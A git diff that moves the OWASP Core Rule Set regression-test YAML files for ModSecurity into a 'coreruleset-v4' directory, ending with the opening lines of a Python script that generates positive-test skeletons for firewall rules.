src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml diff --git a/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/base_positive_rules.py b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/base_positive_rules.py new file mode 100755 index 000000000..b0dc08db3 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/base_positive_rules.py @@ -0,0 +1,104 @@ +#!/usr/bin/env python +#@spartantri 2018 + +import sys +import argparse +import base64 + +parser = argparse.ArgumentParser() + +UserAgent="ModSecurity CRS 3 Tests" +Accept="text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" +AcceptCharset="ISO-8859-1,utf-8;q=0.7,*;q=0.7" +AcceptEncoding="gzip,deflate" +AcceptLanguage="en-us,en;q=0.5" +ContentType="application/x-www-form-urlencoded" +payloads=[] +skeletontest=0 +Meta='''--- + meta: + author: "spartantri" + enabled: true + name: "skeletonid.yaml" + description: "Positive tests for rule skeletonid" + tests: +''' + +parser.add_argument('-a', action='store', dest='Addr', help='Target ip address', + default='127.0.0.1') +parser.add_argument('-p', action='store', dest='Port', help='Target port', + default='80') +parser.add_argument('-v', action='store', dest='Host', help='Target virtual host', + default='localhost') 